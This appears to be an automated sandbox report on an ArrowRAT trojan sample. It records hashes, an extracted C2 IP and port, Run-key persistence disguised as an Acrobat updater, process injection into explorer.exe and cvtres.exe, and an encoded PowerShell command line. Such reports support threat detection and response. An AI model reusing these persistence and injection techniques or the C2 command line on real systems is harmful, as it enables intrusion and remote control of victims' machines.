Analysis
-
max time kernel
149s -
max time network
154s -
platform
windows7_x64 -
resource
win7-20220901-en -
resource tags
arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system -
submitted
07-12-2022 05:36
Static task
static1
Behavioral task
behavioral1
Sample
lib32.exe
Resource
win7-20220901-en
12 signatures
150 seconds
Behavioral task
behavioral2
Sample
lib32.exe
Resource
win10v2004-20221111-en
0 signatures
150 seconds
General
-
Target
lib32.exe
-
Size
2.2MB
-
MD5
286de0123129cb1bdb0533301f435746
-
SHA1
28887e5a7c28661db7b3d4da3612bafd05604813
-
SHA256
a1923ce6f95ba7e57b9d8ea27c1867283cacbc992a0f9e16ec9dd864930d9d71
-
SHA512
07da8387eeffada23d39eed1390972e37031ea72a2f8a046027ac160f8ecef81ba3011698dac5fafc5114fe688796b1bc7c4df8a283dc1e23f76f0a2faf0b0bc
-
SSDEEP
49152:IhgaZCojYG3CmQYbfHxDJ6aiyc7jntoe:IhggwdY7d0tV
Score
10/10
Malware Config
Extracted
Family
arrowrat
Botnet
Client
C2
185.246.221.202:17168
Mutex
WcOErhAdu
Signatures
-
Modifies Installed Components in the registry 2 TTPs 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Active Setup\Installed Components explorer.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Windows\CurrentVersion\Run\update = "\"C:\\Users\\Admin\\AppData\\Roaming\\Acrobat\\update.exe\"" lib32.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 1448 set thread context of 584 1448 lib32.exe 29 PID 584 set thread context of 1832 584 lib32.exe 31 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Modifies registry class 5 IoCs
description ioc Process Set value (data) \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff explorer.exe Key created \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000_Classes\Local Settings explorer.exe Key created \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell explorer.exe Key created \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU explorer.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 820 powershell.exe 584 lib32.exe 584 lib32.exe -
Suspicious use of AdjustPrivilegeToken 18 IoCs
description pid Process Token: SeDebugPrivilege 1448 lib32.exe Token: SeDebugPrivilege 820 powershell.exe Token: SeDebugPrivilege 584 lib32.exe Token: SeShutdownPrivilege 1800 explorer.exe Token: SeShutdownPrivilege 1800 explorer.exe Token: SeShutdownPrivilege 1800 explorer.exe Token: SeShutdownPrivilege 1800 explorer.exe Token: SeShutdownPrivilege 1800 explorer.exe Token: SeShutdownPrivilege 1800 explorer.exe Token: SeShutdownPrivilege 1800 explorer.exe Token: SeShutdownPrivilege 1800 explorer.exe Token: 33 368 AUDIODG.EXE Token: SeIncBasePriorityPrivilege 368 AUDIODG.EXE Token: 33 368 AUDIODG.EXE Token: SeIncBasePriorityPrivilege 368 AUDIODG.EXE Token: SeShutdownPrivilege 1800 explorer.exe Token: SeShutdownPrivilege 1800 explorer.exe Token: SeShutdownPrivilege 1800 explorer.exe -
Suspicious use of FindShellTrayWindow 23 IoCs
pid Process 1800 explorer.exe 1800 explorer.exe 1800 explorer.exe 1800 explorer.exe 1800 explorer.exe 1800 explorer.exe 1800 explorer.exe 1800 explorer.exe 1800 explorer.exe 1800 explorer.exe 1800 explorer.exe 1800 explorer.exe 1800 explorer.exe 1800 explorer.exe 1800 explorer.exe 1800 explorer.exe 1800 explorer.exe 1800 explorer.exe 1800 explorer.exe 1800 explorer.exe 1800 explorer.exe 1800 explorer.exe 1800 explorer.exe -
Suspicious use of SendNotifyMessage 16 IoCs
pid Process 1800 explorer.exe 1800 explorer.exe 1800 explorer.exe 1800 explorer.exe 1800 explorer.exe 1800 explorer.exe 1800 explorer.exe 1800 explorer.exe 1800 explorer.exe 1800 explorer.exe 1800 explorer.exe 1800 explorer.exe 1800 explorer.exe 1800 explorer.exe 1800 explorer.exe 1800 explorer.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 584 lib32.exe -
Suspicious use of WriteProcessMemory 29 IoCs
description pid Process procid_target PID 1448 wrote to memory of 820 1448 lib32.exe 27 PID 1448 wrote to memory of 820 1448 lib32.exe 27 PID 1448 wrote to memory of 820 1448 lib32.exe 27 PID 1448 wrote to memory of 820 1448 lib32.exe 27 PID 1448 wrote to memory of 584 1448 lib32.exe 29 PID 1448 wrote to memory of 584 1448 lib32.exe 29 PID 1448 wrote to memory of 584 1448 lib32.exe 29 PID 1448 wrote to memory of 584 1448 lib32.exe 29 PID 1448 wrote to memory of 584 1448 lib32.exe 29 PID 1448 wrote to memory of 584 1448 lib32.exe 29 PID 1448 wrote to memory of 584 1448 lib32.exe 29 PID 1448 wrote to memory of 584 1448 lib32.exe 29 PID 1448 wrote to memory of 584 1448 lib32.exe 29 PID 584 wrote to memory of 1800 584 lib32.exe 30 PID 584 wrote to memory of 1800 584 lib32.exe 30 PID 584 wrote to memory of 1800 584 lib32.exe 30 PID 584 wrote to memory of 1800 584 lib32.exe 30 PID 584 wrote to memory of 1832 584 lib32.exe 31 PID 584 wrote to memory of 1832 584 lib32.exe 31 PID 584 wrote to memory of 1832 584 lib32.exe 31 PID 584 wrote to memory of 1832 584 lib32.exe 31 PID 584 wrote to memory of 1832 584 lib32.exe 31 PID 584 wrote to memory of 1832 584 lib32.exe 31 PID 584 wrote to memory of 1832 584 lib32.exe 31 PID 584 wrote to memory of 1832 584 lib32.exe 31 PID 584 wrote to memory of 1832 584 lib32.exe 31 PID 1800 wrote to memory of 1668 1800 explorer.exe 33 PID 1800 wrote to memory of 1668 1800 explorer.exe 33 PID 1800 wrote to memory of 1668 1800 explorer.exe 33
Processes
-
C:\Users\Admin\AppData\Local\Temp\lib32.exe"C:\Users\Admin\AppData\Local\Temp\lib32.exe"1⤵
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1448 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMwAxAA==2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:820
-
-
C:\Users\Admin\AppData\Local\Temp\lib32.exeC:\Users\Admin\AppData\Local\Temp\lib32.exe2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:584 -
C:\Windows\explorer.exe"C:\Windows\explorer.exe"3⤵
- Modifies Installed Components in the registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1800 -
C:\Windows\system32\ctfmon.exectfmon.exe4⤵PID:1668
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client 185.246.221.202 17168 WcOErhAdu3⤵PID:1832
-
-
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x5641⤵
- Suspicious use of AdjustPrivilegeToken
PID:368